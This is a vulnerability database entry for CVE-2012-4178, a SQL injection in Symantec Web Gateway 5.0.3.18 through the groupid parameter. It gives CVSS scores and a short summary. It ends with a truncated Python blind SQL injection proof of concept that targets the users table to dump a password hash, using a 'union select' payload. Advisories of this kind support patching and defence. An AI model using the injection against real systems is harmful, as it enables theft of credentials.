7.5
CVSSv2

CVE-2012-4178

Published: 07/08/2012 Updated: 29/08/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in spywall/includes/deptUploads_data.php in Symantec Web Gateway 5.0.3.18 allows remote malicious users to execute arbitrary SQL commands via the groupid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

symantec web gateway 5.0.3.18

Exploits

#!/usr/bin/python # @_Kc57 # Blind SQLi POC # Dumps out the first available hash in the users table of spywall_db import urllib import time from time import sleep timing='25' checks = 0 def check_char(i, pos): global timimg global checks checks += 1 url = '192168200132/spywall/includes/deptUploads_dataphp?groupid=1 union select ...